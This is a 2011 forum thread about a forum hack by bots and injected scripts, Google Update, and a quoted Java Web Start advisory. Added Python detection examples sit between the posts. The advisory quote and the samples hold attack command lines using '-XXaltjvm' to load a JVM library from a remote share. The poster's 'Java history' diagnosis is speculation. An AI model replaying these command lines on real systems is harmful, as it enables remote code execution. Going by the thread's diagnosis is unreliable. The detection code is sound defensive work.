
Author Topic: Internet Wars and Java Attacks  (Read 9477 times)

Offline zorgon

  • Administrator
  • Hero Member
  • *****
  • Posts: 19911
  • Gold 879
Re: Internet Wars and Java Attacks
« Reply #15 on: October 08, 2011, 12:12:35 AM »
Computer Virus Hits U.S. Drone Fleet



Quote
A computer virus has infected the cockpits of America’s Predator and Reaper drones, logging pilots’ every keystroke as they remotely fly missions over Afghanistan and other warzones.

The virus, first detected nearly two weeks ago by the military’s Host-Based Security System, has not prevented pilots at Creech Air Force Base in Nevada from flying their missions overseas. Nor have there been any confirmed incidents of classified information being lost or sent to an outside source. But the virus has resisted multiple efforts to remove it from Creech’s computers, network security specialists say. And the infection underscores the ongoing security risks in what has become the U.S. military’s most important weapons system.

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

http://www.wired.com/dangerroom/2011/10/virus-hits-drone-fleet/

 :o

So hackers are getting into Area 51's Swarm Control at Creech

THIS is a scary statement..

“We keep wiping it off, and it keeps coming back,” says a source familiar with the network infection, one of three that told Danger Room about the virus. “We think it’s benign. But we just don’t know.”

So the forums are all getting hit heavily with no one really knowing WHERE it's coming from. And now today we get a report that the Military, at one of the most secret installations on the planet, with all the billions spent on equipment... have this as an answer

“We think it’s benign. But we just don’t know.”

 :o

Are you scared yet?

Now remember last year?

October 26, 2010

Communication With 50 Nuke Missiles Dropped in ICBM Snafu



Quote
The Air Force swears there was no panic. But for three-quarters of an hour Saturday morning, launch control officers at F.E. Warren Air Force Base in Wyoming couldn’t reliably communicate or monitor the status of 50 Minuteman III nuclear missiles. Gulp.

Backup security and communications systems, located elsewhere on the base, allowed the intercontinental ballistic missiles to be continually monitored. But the outage is considered serious enough that the very highest rungs on the chain of command — including the President — are being briefed on the incident today.

A single hardware failure appears to have been the root cause of the disruption, which snarled communications on the network that links the five launch control centers and 50 silos of the 319th Missile Squadron. Multiple error codes were reported, including “launch facility down.”

It was a “significant disruption of service,” an Air Force official familiar with the incident tells Danger Room. But not unprecedented: “Something similar happened before at other missile fields.”

A disruption of this magnitude, however, is considered an anomaly of anomalies.

“Over the course of 300 alerts — those are 24-hour shifts in the capsule — I saw this happen to three or four missiles, maybe,” says John Noonan, a former U.S. Air Force missile launch officer who first tweeted word of the issue. “This is 50 ICBMs dropping off at once. I never heard of anything like it.”

http://www.wired.com/dangerroom/2010/10/communications-dropped-to-50-nuke-missiles-in-icbm-snafu/

Okay so the Nukes are on the same grid?  :o We are DOOMED

So back to our little problems. I just needed to add this in to show that the big boys are having the same issues... and DON'T KNOW



« Last Edit: October 08, 2011, 01:47:36 AM by zorgon »

Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #16 on: October 08, 2011, 01:50:06 AM »
ellirium113

October 07, 2011, 06:16:05 PM

Author = Zorgon
Well, looking at those two Google Updates
Google Update Task Machine Core
Google Update Task Machine UA
I would say I have found your new version of malware


Check this out:

http://omaha.googlecode.com/svn/wiki/GoogleUpdateOnAScheduleOverview.html



This is supposed to uninstall itself when there are no Google products being used... Chrome, Google Earth, Toolbar etc.


Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #17 on: October 08, 2011, 01:52:10 AM »
Google Update Now a Scheduled Task, But Still Evil



By Scott Gilbertson

Quote
Google has released a slight revision of its Google Update software for Windows. The latest version eliminates the need for Update to run constantly in the background — one of several reasons we’ve previously labeled the software “evil” — but stops short of conforming to the best practices of software updating.

Instead of running constantly in the background, consuming resources and creating a potential security vulnerability, Google Update now runs as a scheduled task.

Google Update has also been changed to allow some control over when it runs. The default is for Update to check with Google’s servers once an hour, but if you dig into the Windows Task Scheduler you can change that interval and even disable it altogether. However, according to the Google Open Source Blog, tinkering with the update interval might cause Google Update to revert to its always-on status.

“When Google Update determines that the Windows Task Scheduler or Service mechanisms are not working as expected,” says the blog, “we have added in fallback mechanisms that cause Google Update to begin running as a continuous process again.”

So much for user control.

You might wonder what all the fuss is about. After all, what’s wrong with keeping your software up to date? Obviously, there’s nothing wrong with it, but Google’s Update software flies in the face of over 20 years of software best practices — there’s simply no need for desktop software to run update checks continuously, or even once an hour.

It’s not hard to see how Google views Update: it’s a way for it to have the constant update capabilities its web apps enjoy, but on your desktop. The problem is that while we accept that we can’t control the web, we most definitely can (and want to) control what happens on our laptops and PCs.

Or at least we could until Google decided we couldn’t.

The well-established practice of checking for updates when an application launches has been serving the industry — and some of its biggest names, like Adobe and Microsoft — well for decades.

The latest version of Google Update is a baby-step in the right direction, but we still won’t be using Chrome, Google Earth or anything else that relies on Google Update until Google does the right thing.

The Mac version of Google update remains unchanged.

http://www.webmonkey.com/2009/07/google_update_now_a_scheduled_task__but_still_evil/
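The two posts above name the updater's scheduled tasks (GoogleUpdateTaskMachineCore and GoogleUpdateTaskMachineUA) and quote Google saying the updater falls back to a resident process when the scheduler is interfered with. Here is an added example, not code from the article, the post or Google, that tells the two states apart on a Windows host. The CSV is constructed in the shape of `schtasks /query /v /fo CSV` output and abridged to the columns used; the process names handed to `updater_mode` are a constructed list standing in for the image-name column of `tasklist` output.

```python
"""Triage of the Google Update scheduled tasks on a Windows host. Added example, not
code from the article or from Google; the CSV is constructed in the shape of
`schtasks /query /v /fo CSV` output and abridged to the columns used here."""
import csv
import io

SAMPLE_SCHTASKS_CSV = """\
"HostName","TaskName","Status","Task To Run","Scheduled Task State","Schedule Type","Repeat: Every"
"PC1","\\GoogleUpdateTaskMachineCore","Ready","C:\\Program Files\\Google\\Update\\GoogleUpdate.exe /c","Enabled","At logon time","Disabled"
"PC1","\\GoogleUpdateTaskMachineUA","Ready","C:\\Program Files\\Google\\Update\\GoogleUpdate.exe /ua /installsource scheduler","Enabled","Daily","1 Hour(s), 0 Minute(s)"
"PC1","\\Microsoft\\Windows\\Defrag\\ScheduledDefrag","Ready","%windir%\\system32\\defrag.exe -c","Enabled","Weekly","Disabled"
"""


def parse_schtasks_csv(text):
    """Rows of the verbose schtasks CSV as dicts keyed by the header line."""
    return list(csv.DictReader(io.StringIO(text)))


def google_update_tasks(rows):
    """Pick out the updater tasks named in the post and the fields worth reviewing."""
    tasks = []
    for r in rows:
        name = r["TaskName"].lstrip("\\")
        if name.startswith("GoogleUpdateTaskMachine"):
            tasks.append({
                "name": name,
                "enabled": r["Scheduled Task State"] == "Enabled",
                "command": r["Task To Run"],
                "repeat": r["Repeat: Every"],
            })
    return tasks


def updater_mode(tasks, running_images):
    """'scheduled' when an updater task is enabled; 'continuous' when GoogleUpdate.exe
    is resident although its tasks are all disabled (the fallback the article quotes);
    'absent' otherwise. running_images is the image-name column of a process listing."""
    resident = any(img.lower() == "googleupdate.exe" for img in running_images)
    enabled = [t for t in tasks if t["enabled"]]
    if resident and not enabled:
        return "continuous"
    if enabled:
        return "scheduled"
    return "absent"


if __name__ == "__main__":
    tasks = google_update_tasks(parse_schtasks_csv(SAMPLE_SCHTASKS_CSV))
    for t in tasks:
        state = "enabled" if t["enabled"] else "disabled"
        print(f'{t["name"]}: {state}, repeat={t["repeat"]}, runs {t["command"]}')
    print("mode:", updater_mode(tasks, ["explorer.exe", "GoogleUpdate.exe"]))
```

On a real host, feed `parse_schtasks_csv` the text of `schtasks /query /v /fo CSV` and `updater_mode` the image names from `tasklist /fo CSV`. A result of "continuous" after you disabled the tasks is exactly the reversion the article complains about; a resident GoogleUpdate.exe while the tasks are still enabled is just the hourly task running and is not flagged.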

Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #18 on: October 08, 2011, 03:32:27 AM »
Okay so, caught up on the events of the past few days...

JAVA ATTACKS

A couple of days ago we got hacked big time. First by a swarm of what I assume were robots, judging by the speed and frequency of the attacks... But these were SMART bots... they got past the captcha (we had a simple one at the time), REGISTERED an account and added weblinks to that account. After the fact I set it to Admin approval and added three questions. That stopped them, but I see in the error logs that they are still knocking daily. It is this stopping them that IDed them as bots.

So, looking up a couple of IP addresses that we banned, like this one that just hit now over 6 times...

31.184.238.8  at this site...   http://www.stopforumspam.com/search.php

yields over 500 aliases for that IP. You can search that site using a username, an IP or an email.

Well, then yesterday we got all our users getting the redirects, false links, virus warnings etc., all different depending on the browser used, the anti-virus program etc... I posted some of the screen captures.

Called up my server to fix the issue... they found some JAVA scripts had gotten in. So we reloaded a saved database and tried again. No help, access still messed up, but it stopped the alerts.

We tried getting access but would get blank pages. Russo spotted a 2 in the address and changed it to a 1 and bang, he was in. So there was a script adding and subtracting numbers to the commands.

We were up late trying to figure out what was going on, and on one screen I saw at the bottom notifications on mouse over... "java history (-1)". So something in the java folder was causing this.
Now I run several cleaners like CCleaner to get cookies etc. out. I DID NOT know until last night that it doesn't clean out JAVA.

At this point I didn't know that yet... we were tired so I moved the forum to a temp folder and got some sleep. Next morning I uploaded my copy of the forum to the server... hoping that would get me a fresh starting point... same login issues. WTF? How can that be? A fresh upload should have worked. Server techs figured the database must be corrupt...


Then I loaded up IE (I NEVER do that :P) and found I could log in... but since my Firefox still had me locked in, I couldn't do anything... so okay, this HAS to be some hidden cookie issue, but there were NONE in IE or FF; cleaned them all out, etc... ran everything I had, checked my computer's security, everything was fine..

Okay so no go... I then remembered the JAVA history issue and googled it:

"clearing java history"  and got right away to this PDF

How to Delete Browsing History from Java

It was from that file I got the instructions I posted at the top. Other operating systems are in the file.

I deleted the history... tried again and everything worked. The forum was now intact (save the front portal, due to the database restore). Log in worked, no more alerts, NOTHING. Told the other admins; they cleared the history and voila, all good.

So far it's been error free for over 24 hours, though the bots are hammering away.

Okay so how does all this tie together?

It SEEMS that what is happening is that a java script lurks outside the front door somehow... I am no expert, just an observer. It then SEEMS to attach itself to a user logging in to a forum. So you go visit, say, ATS and this script sticks to your browser like a burr... then you visit other forums and it hitch-hikes.

So YOU, the user, think the forum you are visiting is giving you a virus, redirect or other alert... and the forum owners can't find it (one found one, it is an ad; coincidence I think). Well, they can't find it because it's not INSIDE, it's lurking when you log in, especially with IE users.

And the forum owners are saying 'It's not us... it's your browser doing it.' Well, in a sense that is true. It is coming via the browser, by a parasite riding along.

So conspiracy people will get all up in arms, blame the operators, blame the PTB, the three letter clubs etc. But then I see that report that Area 51 Swarm Control is having the SAME nuisance attacks and false positives... and THEY don't know what is going on... then I know it's not the PTB doing this.

If I could reach them (I will try) I would suggest they look at the JAVA issue, because even the secret servers and networks operate using JAVA. I cannot say for sure that their problem is the same, but if I were them I would look at that.

Once I cleaned the JAVA history... my PC and the forum are moving faster, a LOT faster. I had a lag before... it's now gone... was likely the cookies in the browser doing it. I don't know but can see the results.
« Last Edit: October 08, 2011, 03:47:37 AM by zorgon »
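The registration burst described in the post above (bots getting past the captcha, registering, then "knocking daily" in the logs) can be picked out of the web server's own access log before anyone looks an address up at stopforumspam. The following is an added example and not part of the original post or the forum's software: the log lines are constructed in Apache combined format (the banned address from the post hammering the form, one ordinary visitor who loaded the form first, and one lone POST with no Referer), and `/index.php?action=register2` is assumed to be the registration POST target of an SMF-style forum.

```python
"""Rate-based triage of automated registrations in a forum's web server access log.
Added example, not code from the forum post or from its forum software; the log lines
are constructed in Apache combined format, and /index.php?action=register2 is assumed
to be the registration POST target (an SMF-style forum)."""
from collections import defaultdict, deque
from datetime import datetime, timedelta
import re

# Constructed sample: the banned address from the post hammering the registration
# form, one real visitor who loaded the form first, and one lone no-referer POST.
SAMPLE_LOG = """\
31.184.238.8 - - [07/Oct/2011:22:01:03 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
31.184.238.8 - - [07/Oct/2011:22:01:04 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
31.184.238.8 - - [07/Oct/2011:22:01:05 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
31.184.238.8 - - [07/Oct/2011:22:01:06 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
31.184.238.8 - - [07/Oct/2011:22:01:07 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
31.184.238.8 - - [07/Oct/2011:22:01:08 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
192.0.2.10 - - [07/Oct/2011:22:02:00 +0000] "GET /index.php?action=register HTTP/1.1" 200 8123 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/7.0"
192.0.2.10 - - [07/Oct/2011:22:04:31 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "http://example.org/index.php?action=register" "Mozilla/5.0 (X11; Linux x86_64) Firefox/7.0"
203.0.113.77 - - [07/Oct/2011:22:09:41 +0000] "POST /index.php?action=register2 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
"""

LOG_RE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"'
)
REGISTER_POST = "/index.php?action=register2"   # assumed registration endpoint


def parse_log(text):
    """Parse combined-format lines into dicts; unparseable lines are skipped, not fatal."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.strptime(e["ts"], "%d/%b/%Y:%H:%M:%S %z")
        events.append(e)
    return events


def find_registration_bots(events, window=timedelta(minutes=5), threshold=3):
    """Return {ip: reason} for addresses whose registration POSTs look automated.

    Two signals: a burst of registration POSTs inside a sliding time window, and
    POSTs that never carry a Referer, i.e. the form was never loaded first.
    """
    by_ip = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"] == REGISTER_POST:
            by_ip[e["ip"]].append(e)

    flagged = {}
    for ip, posts in by_ip.items():
        posts.sort(key=lambda e: e["ts"])
        recent = deque()
        peak = 0
        for e in posts:
            recent.append(e["ts"])
            while recent[0] < e["ts"] - window:   # drop timestamps older than the window
                recent.popleft()
            peak = max(peak, len(recent))
        if peak >= threshold:
            flagged[ip] = f"{peak} registration POSTs within {window}"
        elif all(e["referer"] == "-" for e in posts):
            flagged[ip] = "registration POST without loading the form first"
    return flagged


if __name__ == "__main__":
    for ip, why in sorted(find_registration_bots(parse_log(SAMPLE_LOG)).items()):
        print(f"ban candidate {ip}: {why}")
```

Feed `parse_log` the text of the real access log and hand the flagged addresses to a deny list or to the stopforumspam search the post links. The burst signal is safe to act on automatically; the missing-Referer signal is only a hint for review, since privacy extensions and some proxies strip the header from real visitors.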

Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #19 on: October 08, 2011, 03:54:27 AM »
So then we looked back on the web for JAVA issues and BTS found this

Serious New Java Flaw Affects All Current Versions of Windows

April 9, 2010, 9:37AM

Quote
There is a serious vulnerability in Java that leaves users running any of the current versions of Windows open to simple Web-based attacks that could lead to a complete compromise of the affected system. Two separate researchers released information on the vulnerability on Friday, saying that it has been present in Java for years.

Quote
In short, if you have a recent version of Java running on a Windows machine, you're affected by this flaw.

"Java.exe and javaw.exe support an undocumented-hidden command-line parameter "-XXaltjvm" and curiously also "-J-XXaltjvm" (see -J switch in javaws.exe). This instructs Java to load an alternative JavaVM library (jvm.dll or libjvm.so) from the desired path. Game over. We can set -XXaltjvm=\\IP\evil , in this way javaw.exe will load our evil jvm.dll. Bye bye ASLR, DEP...," Santamarta said in his advisory.

Because the JavaWS technology is included in the Java Runtime Environment, which is used by all of the major browsers, the vulnerability affects all of these applications, including Firefox, Internet Explorer and Chrome, on all versions of Windows from 2000 through Windows 7, Santamarta said. Browsers running on Apple's Mac OS X are not vulnerable.

Serious New Java Flaw Affects All Current Versions of Windows

JavaWS and Javaws.exe



Quote
In his advisory, Ormandy said that he notified Sun about the vulnerability but that the vendor didn't believe it was serious enough to warrant an emergency patch.

"The toolkit provides only minimal validation of the URL parameter, allowing us to pass arbitrary parameters to the javaws utility, which provides enough functionality via command line arguments to allow this error to be exploited. The simplicity with which this error can be discovered has convinced me that releasing this document is in the best interest of everyone except the vendor," Ormandy said.

The workaround for this problem is to disable JavaWS and Javaws.exe, Santamarta said in his advisory. Ormandy has set up a proof-of-concept URL, included in his advisory, that demonstrates the exploit.

Julien Tinnes has more information about this class of Java vulnerability.

Javocalypse

Quote
EDIT: Following its full disclosure Sun fixed Tavis' Java deployment toolkit bug (CVE-2010-0886 and CVE-2010-0887) in a matter of days, wow! No doubts this will be used in the future as an argument for full disclosure.
However, this does not bring much security! An attacker can still automatically downgrade your version of Java (using installJRE) and exploit this bug or any other he likes!

Almost one year ago, I blogged about one of my favorite security bug, found by Sami Koivu.

More specifically, I blogged about a class of Java bugs exposed by Sami Koivu and I mentioned this was the first instance of it.


So I repeat... CLEAN OUT YOUR JAVA HISTORY NOW


« Last Edit: October 08, 2011, 05:15:50 AM by zorgon »
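The two issues quoted in the post above both leave a visible trace: a java, javaw or javaws process started with the undocumented -XXaltjvm switch (or -J-XXaltjvm passed through javaws), and a Deployment Toolkit launch argument that carries javaws switches alongside the JNLP URL because the toolkit barely validated it. The following is an added example of detection logic for both, not code from the post or from the advisories it quotes. The process events are constructed in the shape of Sysmon-style process-creation records, the share host 192.0.2.50 is a documentation address used as a placeholder, and the severity levels are this example's own choice.

```python
"""Detection logic for the two Java issues quoted above: a java/javaw/javaws process
started with -XXaltjvm (or -J-XXaltjvm via javaws), and a Deployment Toolkit launch
argument carrying javaws switches next to the JNLP URL. Added example, not code from
the post or the advisories it quotes; the events are constructed in the shape of
Sysmon-style process-creation records and 192.0.2.50 is a documentation address."""
import re

JAVA_LAUNCHERS = {"java.exe", "javaw.exe", "javaws.exe"}
BROWSERS = {"iexplore.exe", "firefox.exe", "chrome.exe"}
# -XXaltjvm=<path>, or -J-XXaltjvm=<path> when smuggled through the javaws -J pass-through
ALTJVM_RE = re.compile(r'(?i)(?:-J)?-XXaltjvm=("[^"]*"|\S+)')

SAMPLE_EVENTS = [  # constructed
    {"Image": r"C:\Program Files\Java\jre6\bin\javaws.exe",
     "ParentImage": r"C:\Program Files\Internet Explorer\iexplore.exe",
     "CommandLine": r'"C:\Program Files\Java\jre6\bin\javaws.exe" '
                    r'-J-XXaltjvm=\\192.0.2.50\share http://192.0.2.50/app.jnlp'},
    {"Image": r"C:\Program Files\Java\jre6\bin\javaw.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r'"C:\Program Files\Java\jre6\bin\javaw.exe" -jar C:\tools\app.jar'},
    {"Image": r"C:\Program Files\Java\jre6\bin\java.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"java -XXaltjvm=C:\Users\bob\AppData\Local\Temp\x -version"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_process(event):
    """Return None for uninteresting events, else a dict with severity and reasons."""
    image = basename(event["Image"])
    if image not in JAVA_LAUNCHERS:
        return None
    m = ALTJVM_RE.search(event["CommandLine"])
    if not m:
        return None
    target = m.group(1).strip('"')
    parent = basename(event["ParentImage"])
    reasons = [f"{image} started with an alternate JVM path: {target}"]
    severity = "medium"          # any use of the undocumented switch deserves a look
    if target.startswith("\\\\"):
        severity = "high"        # jvm.dll fetched from a share the attacker controls
        reasons.append("alternate JVM would be loaded from a remote UNC share")
    if parent in BROWSERS:
        severity = "high"        # the Web Start / deployment-toolkit path from a web page
        reasons.append(f"launched by a browser ({parent})")
    return {"severity": severity, "target": target, "reasons": reasons}


def scan_processes(events):
    """(index, verdict) for every event that classify_process flags."""
    hits = []
    for i, e in enumerate(events):
        verdict = classify_process(e)
        if verdict:
            hits.append((i, verdict))
    return hits


def smuggled_javaws_options(launch_arg):
    """Tokens in a toolkit launch() argument that are switches rather than the JNLP URL.
    The toolkit bug quoted above was that this argument reached javaws with only
    minimal validation, so anything here beyond the URL is attacker-controlled."""
    return [t for t in launch_arg.split() if t.startswith("-")]


if __name__ == "__main__":
    for i, v in scan_processes(SAMPLE_EVENTS):
        print(f"event {i}: {v['severity']}: " + "; ".join(v["reasons"]))
    print(smuggled_javaws_options(r"http://192.0.2.50/app.jnlp -J-XXaltjvm=\\192.0.2.50\share"))
```

`classify_process` is the shape of rule you would load into an EDR or a Sysmon event 1 pipeline; `smuggled_javaws_options` is the check a web proxy or script scanner would apply to the argument a page hands the toolkit. A non-UNC -XXaltjvm is left at medium rather than high because the advisory does not establish whether the switch has any legitimate use on a given fleet; tune that to your own environment.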

Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #20 on: October 08, 2011, 03:58:12 AM »
The previous information has been provided by a lot of blood and sweat..

If you find any of it useful to save your butt, please donate to the cause...

as soon as I figure out how to put the dang Buttons back in  :P

 ::)

 8)

Stay tuned for additional updates. I don't know yet if we are out of hot water but my server team is working on beefing up security (they better be for what they charge :P )


PS To any spooks listening in... please relay this to the appropriate commands and have them check for this
« Last Edit: October 08, 2011, 05:21:13 AM by zorgon »

Offline Dood

  • Pegasus Alternate Energy Team
  • Regular Members
  • *****
  • Posts: 85
  • Gold 2
Re: Internet Wars and Java Attacks
« Reply #21 on: October 08, 2011, 04:38:51 AM »
I cleaned out mine.  Not at all difficult either...

Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #22 on: October 08, 2011, 04:58:21 AM »
Great to see you made it in. I was watching the error logs and saw your repeated attempts using a history file. Figured I better email you :D

Now I can get some sleep... its been quiet for over 24 hours and the bots are still pounding at the door. So I will save another backup now and get some rest

Offline zorgon

Re: Internet Wars and Java Attacks
« Reply #23 on: October 08, 2011, 02:45:18 PM »
Update: Reply from ATS

This really, REALLY sounds like something picked up via an email or blackhat site that waits until you try to log into another site (any log in could trigger it) and launches a key-logger in the hope of getting log in information.

Usually all these type are really interested in is financial account log ins.

Thanks for the heads up, I'm letting Bill know just in case.

mark...

 

